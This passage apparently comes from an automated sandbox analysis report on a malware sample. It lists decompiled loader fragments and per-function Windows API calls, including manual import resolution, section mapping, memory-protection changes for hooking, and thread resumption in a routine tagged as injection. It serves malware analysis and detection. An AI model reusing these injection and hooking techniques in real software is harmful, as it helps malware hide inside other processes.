							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x00401000
0x00401009
0x0040100e
0x00401014
0x0040101d
0x00401023
0x00401025
0x00401028
0x0040102d
0x00401034
0x00401034
0x00401038
0x0040103e
0x00401043
0x00000000
0x00000000
0x00401049
0x00401053
0x00401055
0x00401058
0x0040105b
0x0040105f
0x00401067
0x00401069
0x0040106c
0x004010d4
0x004010d4
0x004010d8
0x00000000
0x00000000
0x00401071
0x00401077
0x00401079
0x0040108c
0x0040108f
0x0040108f
0x0040108f
0x00401093
0x0040107b
0x0040107b
0x00401083
0x00401085
0x00000000
0x00000000
0x00000000
0x00000000
0x00401085
0x00401073
0x00401073
0x00401087
0x00401087
0x00401087
0x00401096
0x00401099
0x0040109b
0x004010a2
0x0040109d
0x0040109d
0x0040109d
0x004010aa
0x004010b0
0x004010b2
0x004010e2
0x004010b4
0x004010b4
0x004010b7
0x004010b9
0x004010c1
0x004010c1
0x004010c6
0x004010c8
0x004010cf
0x004010d1
0x004010d1
0x004010d1
0x00000000
0x004010d1
0x00000000
0x004010b2
0x00401061
0x00401061
0x00401065
0x00000000
0x00000000
0x00401065
0x004010e5
0x004010e5
0x004010ec
0x004010f1
0x00000000
0x00000000
0x004010f7
0x00401102
0x00000000
0x00401102
0x004010f9
0x004010f9
0x004010ff
0x00000000
0x004010ff
0x0040102d
0x00401103
0x00401108

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
GetProcAddress.KERNEL32(?,00000000), ref: 004010AA

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 0000107130466eeded83d49a8010b7473725015bed9badcf37900099b49ec5a5
Instruction ID: b72cc535f85c283c6eac02e86f5dc7cb5cef7c6c011a718e9dcfe3bf36c0035b
Opcode Fuzzy Hash: 0000107130466eeded83d49a8010b7473725015bed9badcf37900099b49ec5a5
Instruction Fuzzy Hash: A8314975E01206DFDB14CF55C980AAEB7F8BF04301B14407AD981EB3A0E779DA81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0076915C Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,76B324D0,?,00000000,69B25F44,00000000,0075AE17), ref: 00769199
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,0075AE17,?,00000000), ref: 007691FA

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: 4d2804e6ad630d9075b77f6e6021f6ec926fe5bc0151f340dbf998d2fa5ce792
Instruction ID: 531667f06d23763b78ff248954d4cf1e4ba7a3093f5955317c47d7a5e7a7ee45
Opcode Fuzzy Hash: 4d2804e6ad630d9075b77f6e6021f6ec926fe5bc0151f340dbf998d2fa5ce792
Instruction Fuzzy Hash: 48118CB690020DEFDF40EBA4DD49ADE73BCEB09740F104056A906E3151DB78AB84CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00751402 Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 0075142B
NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 0075144D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: 0bf62ca31b5b00e7082c60990d374b9c4a1764ecd5fe9d7bf86f7ef0a4e93482
Instruction ID: ad8420c41ec1659973b5841f6adc5f3161f7ede869e3115db1799ce17eae4c59
Opcode Fuzzy Hash: 0bf62ca31b5b00e7082c60990d374b9c4a1764ecd5fe9d7bf86f7ef0a4e93482
Instruction Fuzzy Hash: 8AF06D71600149FFCB028F85DC48D9EBBBAFB84391B948559F908C3220D679D992DB25

Uniqueness

Uniqueness Score: -1.00%

Function 0040182B Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040182B(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x0040183d
0x00401843
0x00401851
0x00401858
0x0040185d
0x00401863
0x00000000
0x00401864
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040163D,00000002,00000000,?,?,00000000,?,?,0040163D,00000002), ref: 00401858

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 2a02eb540fd5c78477158c36e860967213f0280bee372b2299b957d9b17f6e82
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 2AF012B690020CBFDB119FA5CC85CAFBBBDEB44394B108D3AB552E10A0D6309E089A60

Uniqueness

Uniqueness Score: -1.00%

Function 0075AC19 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 321
memorylibrarysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitializeCriticalSection.NTDLL(00778448), ref: 0075AC37

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

memset.NTDLL ref: 0075AC68
RtlInitializeCriticalSection.NTDLL(03F0C2D0), ref: 0075AC79

Part of subcall function 0076448F: RtlInitializeCriticalSection.NTDLL(00778420), ref: 007644B3
Part of subcall function 0076448F: RtlInitializeCriticalSection.NTDLL(00778400), ref: 007644C9
Part of subcall function 0076448F: GetVersion.KERNEL32(?,00000000,?,?,0075DA8B,?,?,?), ref: 007644DA
Part of subcall function 0076448F: GetModuleHandleA.KERNEL32(0000166E,?,00000000,?,?,0075DA8B,?,?,?), ref: 0076450E

Part of subcall function 0075DC80: RtlAllocateHeap.NTDLL(00000000,-00000003,77D59EB0), ref: 0075DC9A

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075ACA2
GetLastError.KERNEL32(?,00000000,?,?,0075DA8B,?,?,?), ref: 0075ACB3
CloseHandle.KERNEL32(0000052C,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075ACC7
GetUserNameA.ADVAPI32(00000000,?), ref: 0075AD10
RtlAllocateHeap.NTDLL(00000000,?), ref: 0075AD23
GetUserNameA.ADVAPI32(00000000,?), ref: 0075AD38
OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075AD65
GetLastError.KERNEL32(?,00000000,?,?,0075DA8B,?,?,?), ref: 0075AD6F
CloseHandle.KERNEL32(00000000,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075AD7C
GetShellWindow.USER32 ref: 0075AD97
GetWindowThreadProcessId.USER32(00000000), ref: 0075AD9E
memcpy.NTDLL(00778314,?,00000018,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075ADDA
CreateEventA.KERNEL32(00778208,00000001,00000000,00000000,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075AE58
RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0075AE82
OpenEventA.KERNEL32(00100000,00000000,03F0B9C8,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075AEAA
CreateEventA.KERNEL32(00778208,00000001,00000000,03F0B9C8,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075AEBF
GetLastError.KERNEL32(?,00000000,?,?,0075DA8B,?,?,?), ref: 0075AEC5
LoadLibraryA.KERNEL32(?,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075AF5D
SetEvent.KERNEL32(?,00761CA7,00000000,00000000,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075AFF3
RtlAllocateHeap.NTDLL(00000000,00000043,00761CA7), ref: 0075B008
wsprintfA.USER32 ref: 0075B038

Strings

0{w, xrefs: 0075AF7F
0{w, xrefs: 0075AF6D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLast$CloseNameOpenProcessUserWindow$LibraryLoadModuleMutexShellThreadVersionmemcpymemsetwsprintf
String ID: 0{w$0{w
API String ID: 23177601-378086058
Opcode ID: 2e6ad4dcc004a7b8772ff774c35cdd1ef4cbe99a0f5b45bfd5045e89b8c3bc68
Instruction ID: 13356d8cb4880f3c90fc8e650f85cfafa8c07c5d816b817660198c5d0b724899
Opcode Fuzzy Hash: 2e6ad4dcc004a7b8772ff774c35cdd1ef4cbe99a0f5b45bfd5045e89b8c3bc68
Instruction Fuzzy Hash: 49C1B6B0640348EFC760AF25DC4D96B7BA4FB44392B54892DE85EC3261CB7C9889CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0075D221 Relevance: 21.1, APIs: 14, Instructions: 121
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00757FC0), ref: 0075D24A
RtlDeleteCriticalSection.NTDLL(00778400), ref: 0075D27D
RtlDeleteCriticalSection.NTDLL(00778420), ref: 0075D284
ReleaseMutex.KERNEL32(0000052C,00000000,?,?,?,00757FC0), ref: 0075D2AC
CloseHandle.KERNEL32(?,?,00757FC0), ref: 0075D2B8
ResetEvent.KERNEL32(00000000,00000000,?,?,?,00757FC0), ref: 0075D2C4
CloseHandle.KERNEL32(?,?,00757FC0), ref: 0075D2D0
SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00757FC0), ref: 0075D2D6
SleepEx.KERNEL32(00000064,00000001,?,?,00757FC0), ref: 0075D2EA
HeapFree.KERNEL32(00000000,00000000,?,?,00757FC0), ref: 0075D30D
RtlRemoveVectoredExceptionHandler.NTDLL(00498540), ref: 0075D347
SleepEx.KERNEL32(00000064,00000001,?,?,00757FC0), ref: 0075D356
FindCloseChangeNotification.KERNEL32(03F08588,?,?,00757FC0), ref: 0075D37D
LocalFree.KERNEL32(?,?,00757FC0), ref: 0075D38D

Part of subcall function 0075288A: GetVersion.KERNEL32(?,00000000,7476F720,?,0075D23B,00000000,?,?,?,00757FC0), ref: 007528AE
Part of subcall function 0075288A: GetModuleHandleA.KERNEL32(?,03F0973A,?,0075D23B,00000000,?,?,?,00757FC0), ref: 007528CB
Part of subcall function 0075288A: GetProcAddress.KERNEL32(00000000), ref: 007528D2

Part of subcall function 0075C266: RtlEnterCriticalSection.NTDLL(00778420), ref: 0075C270
Part of subcall function 0075C266: RtlLeaveCriticalSection.NTDLL(00778420), ref: 0075C2AC

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalSectionSleep$CloseHandle$DeleteFree$AddressChangeEnterEventExceptionFindHandlerHeapLeaveLocalModuleMutexNotificationProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 1047430009-0
Opcode ID: c472b35358ca438e960c545e162623e203d9351378794f59d2568dae57d81511
Instruction ID: b5e2e7ea5cfb18db7b9942788e4cbe8ebe97ec25b10d28a96c0a5b5042c493f8
Opcode Fuzzy Hash: c472b35358ca438e960c545e162623e203d9351378794f59d2568dae57d81511
Instruction Fuzzy Hash: 8F418471640249DBDB70AFA4DCCD99537A6BB00792B958438EA08D7160CFBDDCC9CA17

Uniqueness

Uniqueness Score: -1.00%

Function 007568E1 Relevance: 15.1, APIs: 10, Instructions: 117
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,?,00000000), ref: 0075692F
VirtualProtect.KERNEL32(00000000,00000000,00000040,-00000020,?,00000000), ref: 00756941
lstrcpy.KERNEL32(00000000,?), ref: 00756950
VirtualProtect.KERNEL32(00000000,00000000,?,-00000020,?,00000000), ref: 00756961
VirtualProtect.KERNEL32(00000000,00000005,00000040,-00000020,00774040,00000018,0075B14C,?,00000000,?,00763E46), ref: 00756998
VirtualProtect.KERNEL32(?,00000004,?,-00000020,?,00000000,?,00763E46,00000000,00000000,00000000,00000000), ref: 007569B3
VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,00774040,00000018,0075B14C,?,00000000,?,00763E46,00000000,00000000,00000000,00000000), ref: 007569C8
VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,00774040,00000018,0075B14C,?,00000000,?,00763E46,00000000,00000000,00000000,00000000), ref: 007569F5
VirtualProtect.KERNEL32(?,00000004,?,-00000020,?,00000000,?,00763E46,00000000,00000000,00000000,00000000), ref: 00756A0F
GetLastError.KERNEL32(?,00000000,?,00763E46,00000000,00000000,00000000,00000000), ref: 00756A16

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: b3a5245d09b49a0aa8e476a5a05c449c1a5cff8bf7839dd6230bf828bcd8bea8
Instruction ID: d08c9fc819b7c6b3e1d0675c1612c13d4cb5f937d8da07b00b10c9f1c5317409
Opcode Fuzzy Hash: b3a5245d09b49a0aa8e476a5a05c449c1a5cff8bf7839dd6230bf828bcd8bea8
Instruction Fuzzy Hash: C3414FB1900709EFDB218FA4CC44FAAB7B5FB04351F408619EA56A75A0DB78ED06DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00766924 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00759BBB: VirtualProtect.KERNEL32(?,?,00000040,00000001, Uqt,?,00000000,74715520,?,00755124,?), ref: 00759BE0
Part of subcall function 00759BBB: GetLastError.KERNEL32(?,00000000,74715520,?,00755124,?), ref: 00759BE8
Part of subcall function 00759BBB: VirtualQuery.KERNEL32(?, Uqt,0000001C,?,00000000,74715520,?,00755124,?), ref: 00759BFF
Part of subcall function 00759BBB: VirtualProtect.KERNEL32(?,?,-2C9B417C,00000001,?,00000000,74715520,?,00755124,?), ref: 00759C24

GetLastError.KERNEL32(00000000,00000004, Uqt,?,80000000,00000000,?,007740B0,0000001C,00760691,00000002,?,00000001,?,\yw,?), ref: 00766A7F

Part of subcall function 0076586B: lstrlen.KERNEL32(?,?,00755124,?), ref: 007658A3
Part of subcall function 0076586B: lstrcpy.KERNEL32(00000000,?), ref: 007658BA
Part of subcall function 0076586B: StrChrA.SHLWAPI(00000000,0000002E), ref: 007658C3
Part of subcall function 0076586B: GetModuleHandleA.KERNEL32(00000000), ref: 007658E1

VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,?,?,00000001,00000000,00000004, Uqt,?,80000000), ref: 007669FC
VirtualProtect.KERNEL32(00000006,00000004, Uqt, Uqt,?,00000001,00000000,00000004, Uqt,?,80000000,00000000,?,007740B0,0000001C,00760691), ref: 00766A17
RtlEnterCriticalSection.NTDLL(00778420), ref: 00766A3C
RtlLeaveCriticalSection.NTDLL(00778420), ref: 00766A5A

Part of subcall function 00759BBB: SetLastError.KERNEL32(?,?,00000000,74715520,?,00755124,?), ref: 00759C2D

Strings

, xrefs: 007669EB
Uqt, xrefs: 0076695B, 00766A0D, 00766A11, 0076695E, 00766A10

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID: $ Uqt
API String ID: 899430048-690394022
Opcode ID: 87cb01eeb468cf9b3b4ce8b5798218a19d34d44bd0a259456b8cda5dab5618e4
Instruction ID: dfb869bd2aa4e9fe9a770e0480e1c37e0bbf3ee061361d55957359fd5cc0dd09
Opcode Fuzzy Hash: 87cb01eeb468cf9b3b4ce8b5798218a19d34d44bd0a259456b8cda5dab5618e4
Instruction Fuzzy Hash: 78415DB1800619EFDB10DFA5C949A9DBBB4FF08350F14C119ED19A7651D778EA50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 007604F5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,80000000,?,?,007740C0,00000018,0076CD58,?,?,80000000,007779E8,-0000000C,?), ref: 00760538
VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?, Uqt,?,?,80000000,?,?,007740C0,00000018,0076CD58), ref: 007605C3
RtlEnterCriticalSection.NTDLL(00778420), ref: 007605EC
RtlLeaveCriticalSection.NTDLL(00778420), ref: 0076060A

Strings

Uqt, xrefs: 0076055C, 00760578, 0076055F, 007605D4, 00760628

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID: Uqt
API String ID: 3666628472-2320327147
Opcode ID: 23f3d3157cfebb5598551d4009c7de4c7ee43647d36c1d9cabd8c0b27d7bc8e9
Instruction ID: 2c96292fef51f40e33f71207f580f53972595242176268cdde3985859df8e004
Opcode Fuzzy Hash: 23f3d3157cfebb5598551d4009c7de4c7ee43647d36c1d9cabd8c0b27d7bc8e9
Instruction Fuzzy Hash: 76413070900709EFCB11DF65C884A9EBBF5FF48340B108529E91AE7251D7789A51DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00759BBB Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,00000040,00000001, Uqt,?,00000000,74715520,?,00755124,?), ref: 00759BE0
GetLastError.KERNEL32(?,00000000,74715520,?,00755124,?), ref: 00759BE8
VirtualQuery.KERNEL32(?, Uqt,0000001C,?,00000000,74715520,?,00755124,?), ref: 00759BFF
VirtualProtect.KERNEL32(?,?,-2C9B417C,00000001,?,00000000,74715520,?,00755124,?), ref: 00759C24
SetLastError.KERNEL32(?,?,00000000,74715520,?,00755124,?), ref: 00759C2D

Strings

Uqt, xrefs: 00759BF8, 00759BFB
Uqt, xrefs: 00759BC9

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID: Uqt$ Uqt
API String ID: 148356745-1020971220
Opcode ID: 320497de8a3a850e62e19ea90b5aea27e4d8aafc1a1802e1ed10d051814ccfb1
Instruction ID: 3b9bfcb0e34eca0a3486de354c049a0ead37d1f37a05b5f9c553d4e7d1ce6e55
Opcode Fuzzy Hash: 320497de8a3a850e62e19ea90b5aea27e4d8aafc1a1802e1ed10d051814ccfb1
Instruction Fuzzy Hash: B401297250020DFFAF119FA9DC448DABBB9FF09355B008426FA45D2220D7B59A54EB64

Uniqueness

Uniqueness Score: -1.00%

Function 007548BA Relevance: 10.6, APIs: 7, Instructions: 110
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007541C8: GetProcAddress.KERNEL32(?,00000318), ref: 007541ED
Part of subcall function 007541C8: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00754209

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 007548F3
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007549DE

Part of subcall function 007541C8: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000100,00000200), ref: 00754373

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00754929
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00754935
lstrcmpi.KERNEL32(?,00000000), ref: 00754972
StrChrA.SHLWAPI(?,0000002E), ref: 0075497B
lstrcmpi.KERNEL32(?,00000000), ref: 0075498D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
String ID:
API String ID: 3901270786-0
Opcode ID: c5b71ff26a595b3c5e8684dea5d264aacc48f3afc14c536ffb60181af8548b08
Instruction ID: a437d96b50db401670d8bdd6403e7dbb48eec45bb90e0cc7980d99c2e41fc110
Opcode Fuzzy Hash: c5b71ff26a595b3c5e8684dea5d264aacc48f3afc14c536ffb60181af8548b08
Instruction Fuzzy Hash: B031A571104315ABD7218F11DC45B6BBBE8FF8475AF100A19FD8867240D7B8E998CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0075D87E Relevance: 10.6, APIs: 7, Instructions: 84
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0076E4F0: memset.NTDLL ref: 0076E4FA

OpenEventA.KERNEL32(00000002,00000000,00778314,?,00000000,00000000,?,00761E07,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075D918
SetEvent.KERNEL32(00000000,?,00761E07,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075D925
Sleep.KERNEL32(00000BB8,?,00761E07,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075D930
ResetEvent.KERNEL32(00000000,?,00761E07,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075D937
CloseHandle.KERNEL32(00000000,?,00761E07,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075D93E
GetShellWindow.USER32 ref: 0075D949
GetWindowThreadProcessId.USER32(00000000), ref: 0075D950

Part of subcall function 00770C20: RegCloseKey.ADVAPI32(00000000), ref: 00770CA3

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
String ID:
API String ID: 53838381-0
Opcode ID: 19dd1a7c2decf18006846624ea165348797135007574bcc7d2867c6959e4a18c
Instruction ID: fad921e1e6ddaa8c2752ae9cee96d226e5fc6e25d97314b78b508a273d94125b
Opcode Fuzzy Hash: 19dd1a7c2decf18006846624ea165348797135007574bcc7d2867c6959e4a18c
Instruction Fuzzy Hash: C521C432240114EBD2716769EC4DEAB7B6AEBC9B91F04C008F90D87111DB7C6C41D76A

Uniqueness

Uniqueness Score: -1.00%

Function 0076BB46 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,00778190,?,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BB67
GetProcAddress.KERNEL32(00000000,?), ref: 0076BB80
OpenProcess.KERNEL32(00000400,00000000,0076DA64,00778190,?,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BB9D
IsWow64Process.KERNEL32(00000000,00000000,00778190,?,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BBAE
FindCloseChangeNotification.KERNEL32(00000000,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BBC1

Strings

PWqt, xrefs: 0076BB53, 0076BB86, 0076BBAE

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
String ID: PWqt
API String ID: 1712524627-3807778073
Opcode ID: 0d14c7d2da85c376d048e56c44c880ae0d587c32e3a946d15e501853546c2220
Instruction ID: bc53c11422941ff980283b60d362fd7e69fdc36696c5aca18a8b56fb0175450a
Opcode Fuzzy Hash: 0d14c7d2da85c376d048e56c44c880ae0d587c32e3a946d15e501853546c2220
Instruction Fuzzy Hash: A001C0B1900608EFDB11DF65DC4CCAA7BA8FB863D17108129E90ED7214E73C4A81CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0076DA21 Relevance: 9.1, APIs: 6, Instructions: 123
threadsynchronizationinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0076DA44

Part of subcall function 0076BB46: GetModuleHandleA.KERNEL32(?,00778190,?,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BB67
Part of subcall function 0076BB46: GetProcAddress.KERNEL32(00000000,?), ref: 0076BB80
Part of subcall function 0076BB46: OpenProcess.KERNEL32(00000400,00000000,0076DA64,00778190,?,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BB9D
Part of subcall function 0076BB46: IsWow64Process.KERNEL32(00000000,00000000,00778190,?,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BBAE
Part of subcall function 0076BB46: FindCloseChangeNotification.KERNEL32(00000000,?,?,0076DA64,00000000,00778190,?,00000000), ref: 0076BBC1

ResumeThread.KERNEL32(?,?,?,CCCCFEEB,?,?,?,00000004,?,00000000,00778190,?,00000000), ref: 0076DAFD
